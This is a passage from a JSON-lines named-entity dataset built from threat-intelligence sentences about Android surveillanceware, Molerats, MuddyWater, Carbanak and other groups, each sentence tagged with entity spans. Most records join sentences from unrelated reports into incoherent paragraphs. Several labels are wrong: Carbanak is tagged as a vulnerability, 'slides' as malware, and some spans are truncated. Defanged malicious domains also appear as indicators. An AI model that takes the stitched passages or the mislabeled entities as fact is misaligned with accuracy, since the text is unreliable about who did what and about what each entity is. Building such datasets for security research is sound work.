that dropped a PIVY payload that connected to command-and-control ( CnC ) infrastructure used by the Molerats attackers .", "spans": [{"start": 154, "end": 167, "label": "Vulnerability"}, {"start": 186, "end": 193, "label": "Organization"}, {"start": 400, "end": 404, "label": "Malware"}, {"start": 431, "end": 450, "label": "System"}, {"start": 453, "end": 456, "label": "System"}, {"start": 486, "end": 494, "label": "Organization"}, {"start": 495, "end": 504, "label": "Organization"}]} {"text": "The server sends back encoded json containing URL , class name and method name . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": [{"start": 118, "end": 132, "label": "Vulnerability"}, {"start": 167, "end": 173, "label": "Organization"}, {"start": 227, "end": 243, "label": "Vulnerability"}, {"start": 290, "end": 299, "label": "Indicator"}, {"start": 327, "end": 346, "label": "Indicator"}]} {"text": "Then the application downloads java archive from the URL specified in json , dynamically loads it with class loader API . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS17-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket (psexec.exe) . 
In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net .", "spans": [{"start": 221, "end": 230, "label": "Malware"}, {"start": 272, "end": 285, "label": "Vulnerability"}, {"start": 311, "end": 319, "label": "Malware"}, {"start": 320, "end": 332, "label": "Malware"}, {"start": 417, "end": 423, "label": "Malware"}, {"start": 474, "end": 482, "label": "Malware"}, {"start": 489, "end": 498, "label": "Organization"}, {"start": 503, "end": 527, "label": "Malware"}, {"start": 550, "end": 577, "label": "Malware"}, {"start": 580, "end": 583, "label": "Malware"}, {"start": 588, "end": 598, "label": "Malware"}, {"start": 601, "end": 610, "label": "Malware"}, {"start": 613, "end": 622, "label": "Malware"}, {"start": 625, "end": 634, "label": "Malware"}, {"start": 639, "end": 646, "label": "Malware"}]} {"text": "Once archive is loaded , the application uses reflection api to call methods from the class names specified in the json . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 .", "spans": [{"start": 185, "end": 198, "label": "System"}, {"start": 254, "end": 267, "label": "Vulnerability"}, {"start": 316, "end": 325, "label": "Malware"}, {"start": 337, "end": 345, "label": "Malware"}, {"start": 357, "end": 365, "label": "Malware"}]} {"text": "Rooting and Ad Network Presentation The reflection loaded methods check if the device is rooted . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . 
It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering .", "spans": [{"start": 113, "end": 119, "label": "Organization"}, {"start": 207, "end": 220, "label": "Vulnerability"}, {"start": 260, "end": 268, "label": "Malware"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 306, "end": 320, "label": "Organization"}, {"start": 327, "end": 338, "label": "Organization"}]} {"text": "If not , the application downloads a pack of exploits from the server and runs them one-by-one up until root is achieved . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC .", "spans": [{"start": 156, "end": 162, "label": "Malware"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 244, "end": 268, "label": "System"}, {"start": 298, "end": 312, "label": "Organization"}, {"start": 346, "end": 352, "label": "Organization"}, {"start": 355, "end": 364, "label": "Organization"}, {"start": 367, "end": 374, "label": "Organization"}, {"start": 381, "end": 384, "label": "Organization"}]} {"text": "As root , the application copies su binary to /system/bin directory and silently downloads apk file from the server . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . 
DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering .", "spans": [{"start": 131, "end": 138, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 222, "end": 254, "label": "Vulnerability"}, {"start": 305, "end": 312, "label": "System"}, {"start": 315, "end": 323, "label": "Malware"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 387, "end": 401, "label": "Organization"}]} {"text": "Then , the APK is installed as system application and registers listener on USER_PRESENT event . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 201, "end": 233, "label": "Vulnerability"}, {"start": 284, "end": 291, "label": "System"}]} {"text": "This event triggers archive downloading thread . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . The United States and countries in Europe are targeted as well .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 114, "end": 122, "label": "System"}, {"start": 131, "end": 145, "label": "System"}, {"start": 148, "end": 152, "label": "System"}, {"start": 178, "end": 191, "label": "Vulnerability"}]} {"text": "Once the event is triggered , it registers a timer . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . 
The sample analyzed is f589827c4cf94662544066b80bfda6ab from late August 2015 .", "spans": [{"start": 57, "end": 69, "label": "Organization"}, {"start": 113, "end": 127, "label": "Vulnerability"}, {"start": 145, "end": 152, "label": "System"}, {"start": 159, "end": 179, "label": "System"}]} {"text": "The timer triggers additional thread which makes a request to the server . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The MuddyWater attacks are primarily against Middle Eastern nations .", "spans": [{"start": 75, "end": 80, "label": "Organization"}, {"start": 124, "end": 138, "label": "Vulnerability"}, {"start": 156, "end": 163, "label": "System"}, {"start": 170, "end": 190, "label": "System"}]} {"text": "It expects a json with url , class and method name . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA .", "spans": [{"start": 57, "end": 62, "label": "Organization"}, {"start": 106, "end": 120, "label": "Vulnerability"}, {"start": 138, "end": 145, "label": "System"}, {"start": 152, "end": 172, "label": "System"}]} {"text": "It downloads one more archive and dynamically loads code from it . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . 
Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 113, "end": 132, "label": "Vulnerability"}, {"start": 141, "end": 157, "label": "System"}, {"start": 158, "end": 167, "label": "System"}, {"start": 255, "end": 263, "label": "Organization"}, {"start": 272, "end": 284, "label": "Organization"}, {"start": 325, "end": 334, "label": "Organization"}, {"start": 356, "end": 365, "label": "Organization"}, {"start": 370, "end": 388, "label": "Organization"}, {"start": 391, "end": 413, "label": "Organization"}, {"start": 416, "end": 427, "label": "Organization"}, {"start": 430, "end": 449, "label": "Organization"}]} {"text": "The final APK is downloaded from a different URL that is currently down ; we assume that the apk purpose is overlaying ads on the screen ; we assume this based on the research we have done on the API we found which returns URL of random APK file containing different advertising networks . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": [{"start": 294, "end": 302, "label": "System"}, {"start": 400, "end": 413, "label": "Vulnerability"}, {"start": 416, "end": 429, "label": "Vulnerability"}, {"start": 451, "end": 477, "label": "Organization"}, {"start": 525, "end": 540, "label": "Indicator"}, {"start": 606, "end": 616, "label": "Organization"}, {"start": 641, "end": 653, "label": "Organization"}]} {"text": "Persistency Watch-Dog The application contains protection against its own removal . 
We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" .", "spans": [{"start": 148, "end": 161, "label": "Vulnerability"}, {"start": 172, "end": 180, "label": "System"}, {"start": 234, "end": 242, "label": "Vulnerability"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 362, "end": 399, "label": "Malware"}, {"start": 410, "end": 420, "label": "Malware"}]} {"text": "As outlined in the diagram above , It installs an additional application with the same functionality and these two applications monitor the removal of each other . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 .", "spans": [{"start": 164, "end": 171, "label": "Organization"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 236, "end": 270, "label": "Vulnerability"}, {"start": 273, "end": 286, "label": "Vulnerability"}, {"start": 303, "end": 318, "label": "System"}, {"start": 564, "end": 568, "label": "Organization"}]} {"text": "If one of the applications is deleted , the second application downloads and re-installs the removed one . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . 
FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors .", "spans": [{"start": 107, "end": 134, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 199, "end": 233, "label": "Vulnerability"}, {"start": 236, "end": 249, "label": "Vulnerability"}, {"start": 266, "end": 281, "label": "System"}, {"start": 308, "end": 312, "label": "Organization"}, {"start": 387, "end": 397, "label": "Organization"}, {"start": 400, "end": 408, "label": "Organization"}, {"start": 413, "end": 430, "label": "Organization"}]} {"text": "Network activity BrainTest communicates with five servers : APK files provider ( http : //psserviceonline [ . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" .", "spans": [{"start": 81, "end": 109, "label": "Indicator"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 215, "end": 231, "label": "Vulnerability"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 433, "end": 437, "label": "Organization"}, {"start": 494, "end": 507, "label": "Malware"}, {"start": 515, "end": 530, "label": "Malware"}, {"start": 533, "end": 545, "label": "Malware"}]} {"text": "] com/ ) : This server provides APK files with advertising network . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . 
There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 .", "spans": [{"start": 99, "end": 115, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}, {"start": 185, "end": 201, "label": "Vulnerability"}, {"start": 327, "end": 338, "label": "Organization"}, {"start": 377, "end": 386, "label": "Organization"}, {"start": 426, "end": 430, "label": "Organization"}]} {"text": "We found two functions : The first function is http : //s.psserviceonline [ . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups .", "spans": [{"start": 47, "end": 77, "label": "Indicator"}, {"start": 78, "end": 87, "label": "Organization"}, {"start": 98, "end": 114, "label": "Organization"}, {"start": 132, "end": 173, "label": "Vulnerability"}, {"start": 176, "end": 189, "label": "Vulnerability"}, {"start": 236, "end": 242, "label": "System"}, {"start": 307, "end": 319, "label": "Malware"}, {"start": 320, "end": 327, "label": "Malware"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 362, "end": 372, "label": "Organization"}, {"start": 391, "end": 397, "label": "Organization"}]} {"text": "] com/api/s2s/tracks/ and is used for activation . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . 
In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation .", "spans": [{"start": 51, "end": 60, "label": "Organization"}, {"start": 71, "end": 76, "label": "Organization"}, {"start": 94, "end": 135, "label": "Vulnerability"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 198, "end": 204, "label": "System"}, {"start": 306, "end": 314, "label": "Organization"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 351, "end": 362, "label": "Organization"}, {"start": 365, "end": 375, "label": "Organization"}, {"start": 418, "end": 425, "label": "Organization"}]} {"text": "The second function is http : //s.psserviceonline [ . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": [{"start": 23, "end": 53, "label": "Indicator"}, {"start": 54, "end": 67, "label": "Organization"}, {"start": 123, "end": 145, "label": "Vulnerability"}, {"start": 334, "end": 351, "label": "Malware"}, {"start": 371, "end": 389, "label": "Malware"}, {"start": 398, "end": 410, "label": "Malware"}, {"start": 511, "end": 518, "label": "System"}, {"start": 543, "end": 554, "label": "Indicator"}]} {"text": "] com/api/ads/ which is used for obtaining a link to APK file . 
The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests .", "spans": [{"start": 68, "end": 73, "label": "Organization"}, {"start": 129, "end": 151, "label": "Vulnerability"}, {"start": 311, "end": 319, "label": "Organization"}]} {"text": "Regardless of the parameters , it returns a json containing a link for APK file . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . During the operations , the group used tools consistent with those leveraged during past intrusions including Powermud , a custom tool used by the Seedworm group , and customized PowerShell , LaZagne , and Crackmapexec scripts .", "spans": [{"start": 82, "end": 95, "label": "Organization"}, {"start": 178, "end": 192, "label": "System"}, {"start": 218, "end": 232, "label": "Vulnerability"}, {"start": 361, "end": 369, "label": "Malware"}, {"start": 398, "end": 412, "label": "Organization"}, {"start": 419, "end": 440, "label": "Malware"}, {"start": 443, "end": 450, "label": "Malware"}, {"start": 457, "end": 477, "label": "Malware"}]} {"text": "File Server ( http : //www.psservicedl [ . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . 
The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location .", "spans": [{"start": 14, "end": 42, "label": "Indicator"}, {"start": 47, "end": 52, "label": "Organization"}, {"start": 135, "end": 149, "label": "System"}, {"start": 175, "end": 189, "label": "Vulnerability"}, {"start": 212, "end": 226, "label": "Organization"}, {"start": 240, "end": 257, "label": "Malware"}, {"start": 307, "end": 326, "label": "System"}, {"start": 329, "end": 332, "label": "System"}]} {"text": "] com ) : Contains android packages , java archives and zip archives with exploits Archive Link domains : Three domains with the same functionality , but the application chooses one of them to send request for archive link . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals .", "spans": [{"start": 19, "end": 26, "label": "System"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 287, "end": 300, "label": "Organization"}, {"start": 367, "end": 380, "label": "Vulnerability"}, {"start": 521, "end": 529, "label": "Malware"}, {"start": 533, "end": 542, "label": "Malware"}, {"start": 545, "end": 553, "label": "Organization"}, {"start": 679, "end": 684, "label": "System"}]} {"text": "http : //www.himobilephone [ . 
While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials .", "spans": [{"start": 0, "end": 30, "label": "Indicator"}, {"start": 70, "end": 81, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 193, "end": 206, "label": "Vulnerability"}, {"start": 293, "end": 301, "label": "Organization"}, {"start": 338, "end": 345, "label": "Malware"}, {"start": 350, "end": 362, "label": "Malware"}, {"start": 373, "end": 380, "label": "System"}]} {"text": "] com http : //www.adsuperiorstore [ . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 .", "spans": [{"start": 6, "end": 38, "label": "Indicator"}, {"start": 39, "end": 47, "label": "Vulnerability"}, {"start": 90, "end": 97, "label": "System"}, {"start": 115, "end": 124, "label": "Organization"}, {"start": 223, "end": 231, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}]} {"text": "] com http : //www.i4vip [ . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . 
The Seedworm group is the only group known to use the Powermud backdoor .", "spans": [{"start": 6, "end": 28, "label": "Indicator"}, {"start": 61, "end": 69, "label": "Vulnerability"}, {"start": 238, "end": 251, "label": "Vulnerability"}, {"start": 291, "end": 305, "label": "Organization"}, {"start": 341, "end": 358, "label": "Malware"}]} {"text": "] com Counter Measures Use an up to date anti-malware software that is capable of identifying this threat . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East .", "spans": [{"start": 165, "end": 188, "label": "System"}, {"start": 191, "end": 194, "label": "System"}, {"start": 199, "end": 207, "label": "Vulnerability"}]} {"text": "If the threat reappears on the device after the first installation , it means that the malware managed to install the persistency module in the System directory . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . MuddyWater is an Iranian high-profile threat actor that 's been seen active since 2017 .", "spans": [{"start": 163, "end": 171, "label": "Vulnerability"}, {"start": 308, "end": 318, "label": "Organization"}]} {"text": "In this case , the device should be re-flashed with an official ROM . Sensitive bank documents have be found on the servers that were controlling Carbanak . 
Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": [{"start": 146, "end": 154, "label": "Vulnerability"}, {"start": 224, "end": 236, "label": "Malware"}, {"start": 241, "end": 251, "label": "Malware"}]} {"text": "Lookout Discovers Phishing Sites Distributing New IOS And Android Surveillanceware April 8 , 2019 For the past year , Lookout researchers have been tracking Android and iOS surveillanceware , that can exfiltrate contacts , audio recordings , photos , location , and more from devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . Over the past year , we've seen the group extensively targeting a wide gamut of entities in various sectors , including Governments , Academy , Crypto-Currency , Telecommunications and the Oil sectors .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 50, "end": 53, "label": "System"}, {"start": 58, "end": 65, "label": "System"}, {"start": 66, "end": 82, "label": "Malware"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 157, "end": 164, "label": "System"}, {"start": 169, "end": 172, "label": "System"}, {"start": 173, "end": 189, "label": "Malware"}, {"start": 324, "end": 332, "label": "Vulnerability"}, {"start": 333, "end": 342, "label": "Organization"}, {"start": 578, "end": 589, "label": "Organization"}, {"start": 592, "end": 599, "label": "Organization"}, {"start": 602, "end": 617, "label": "Organization"}, {"start": 620, "end": 638, "label": "Organization"}, {"start": 647, "end": 658, "label": "Organization"}]} {"text": "As has been previously reported , some versions of the Android malware were present in the Google Play Store . 
We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": [{"start": 55, "end": 62, "label": "System"}, {"start": 91, "end": 108, "label": "System"}, {"start": 131, "end": 139, "label": "Vulnerability"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 256, "end": 274, "label": "Organization"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 377, "end": 389, "label": "Malware"}, {"start": 394, "end": 404, "label": "Malware"}]} {"text": "The iOS versions were available outside the app store , through phishing sites , and abused the Apple Developer Enterprise program . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . Depending on each sample , the content of document is either a fake resume application , or a letter from the Ministry of Justice in Lebanon or Saudi Arabia .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 44, "end": 53, "label": "System"}, {"start": 96, "end": 122, "label": "Organization"}, {"start": 205, "end": 213, "label": "Vulnerability"}, {"start": 230, "end": 248, "label": "Organization"}, {"start": 259, "end": 276, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}, {"start": 299, "end": 311, "label": "Organization"}, {"start": 377, "end": 400, "label": "Malware"}, {"start": 408, "end": 414, "label": "Malware"}]} {"text": "Background : Android surveillanceware Early last year , Lookout discovered a sophisticated Android surveillanceware agent that appears to have been created for the lawful intercept market . 
Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network .", "spans": [{"start": 13, "end": 20, "label": "System"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 91, "end": 98, "label": "System"}, {"start": 190, "end": 198, "label": "Vulnerability"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 366, "end": 373, "label": "System"}, {"start": 392, "end": 443, "label": "Organization"}, {"start": 446, "end": 450, "label": "Organization"}, {"start": 486, "end": 504, "label": "Indicator"}, {"start": 523, "end": 531, "label": "Organization"}, {"start": 535, "end": 552, "label": "Indicator"}, {"start": 559, "end": 569, "label": "Malware"}, {"start": 696, "end": 703, "label": "Vulnerability"}]} {"text": "The agent appears to have been under development for at least five years and consists of three stages . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . 
From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East .", "spans": [{"start": 114, "end": 122, "label": "Vulnerability"}, {"start": 159, "end": 164, "label": "Organization"}, {"start": 169, "end": 187, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 279, "end": 317, "label": "Organization"}, {"start": 332, "end": 341, "label": "Organization"}]} {"text": "First , there is a small dropper , then a large second stage payload that contains multiple binaries ( where most of the surveillance functionality is implemented ) , and finally a third stage which typically uses the DirtyCOW exploit ( CVE-2016-5195 ) to obtain root . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": [{"start": 218, "end": 234, "label": "Vulnerability"}, {"start": 237, "end": 250, "label": "Vulnerability"}, {"start": 281, "end": 289, "label": "Vulnerability"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 361, "end": 376, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}, {"start": 447, "end": 463, "label": "Organization"}]} {"text": "Security Without Borders has recently published an analysis of this family , independently , through their blog . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . 
This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia .", "spans": [{"start": 0, "end": 24, "label": "Organization"}, {"start": 185, "end": 193, "label": "Vulnerability"}, {"start": 288, "end": 298, "label": "System"}, {"start": 303, "end": 314, "label": "System"}, {"start": 322, "end": 327, "label": "Organization"}, {"start": 385, "end": 401, "label": "Organization"}]} {"text": "Several technical details indicated that the software was likely the product of a well-funded development effort and aimed at the lawful intercept market . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . When successfully executed , the malicious documents install a backdoor we track as POWERSTATS .", "spans": [{"start": 184, "end": 192, "label": "Vulnerability"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 412, "end": 420, "label": "Malware"}, {"start": 433, "end": 443, "label": "Malware"}]} {"text": "These included the use of certificate pinning and public key encryption for C2 communications , geo-restrictions imposed by the C2 when delivering the second stage , and the comprehensive and well implemented suite of surveillance features . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider . 
The group is known for espionage campaigns in the Middle East .", "spans": [{"start": 270, "end": 285, "label": "Organization"}, {"start": 346, "end": 354, "label": "Organization"}, {"start": 390, "end": 398, "label": "Vulnerability"}, {"start": 416, "end": 437, "label": "Organization"}, {"start": 450, "end": 463, "label": "Organization"}]} {"text": "Early versions of the Android application used infrastructure which belonged to a company named Connexxa S.R.L . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . The threat group in this recently observed campaign \u2013 TEMP.Zagros \u2013 weaponized their malware using the following techniques .", "spans": [{"start": 22, "end": 29, "label": "System"}, {"start": 96, "end": 112, "label": "Organization"}, {"start": 131, "end": 141, "label": "Organization"}, {"start": 153, "end": 161, "label": "Vulnerability"}, {"start": 210, "end": 232, "label": "Organization"}]} {"text": "and were signed using the name of an engineer who appears to hold equity in Connexxa . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . 
The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro .", "spans": [{"start": 76, "end": 84, "label": "Organization"}, {"start": 104, "end": 119, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 153, "end": 162, "label": "Organization"}, {"start": 175, "end": 197, "label": "Organization"}, {"start": 247, "end": 255, "label": "Vulnerability"}, {"start": 260, "end": 266, "label": "System"}, {"start": 346, "end": 356, "label": "Organization"}, {"start": 383, "end": 401, "label": "Malware"}, {"start": 415, "end": 424, "label": "Malware"}, {"start": 425, "end": 436, "label": "Malware"}]} {"text": "This engineer \u2019 s name is also associated with a company called eSurv S.R.L . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . The threat group in this recently observed campaign a TEMP.Zagros a weaponized their malware using the following techniques .", "spans": [{"start": 64, "end": 77, "label": "Organization"}, {"start": 109, "end": 120, "label": "Organization"}, {"start": 125, "end": 135, "label": "System"}, {"start": 258, "end": 266, "label": "System"}, {"start": 333, "end": 339, "label": "System"}, {"start": 344, "end": 354, "label": "System"}]} {"text": "eSurv \u2019 s public marketing is centered around video surveillance software and image recognition systems , but there are a number of individuals claiming to be mobile security researchers working at the company , including one who has publically made claims to be developing a mobile surveillance agent . 
Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 379, "end": 387, "label": "Vulnerability"}, {"start": 392, "end": 411, "label": "Organization"}, {"start": 513, "end": 535, "label": "Organization"}, {"start": 623, "end": 637, "label": "System"}, {"start": 708, "end": 718, "label": "System"}, {"start": 721, "end": 723, "label": "System"}]} {"text": "Moreover , eSurv was a business unit of Connexxa and was leased to eSurv S.R.L in 2014 . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . MuddyWater is a relatively new APT that surfaced in 2017 .", "spans": [{"start": 11, "end": 16, "label": "Organization"}, {"start": 40, "end": 48, "label": "Organization"}, {"start": 67, "end": 78, "label": "Organization"}, {"start": 139, "end": 143, "label": "Organization"}, {"start": 177, "end": 185, "label": "Vulnerability"}, {"start": 215, "end": 224, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}]} {"text": "This business unit and the eSurv software 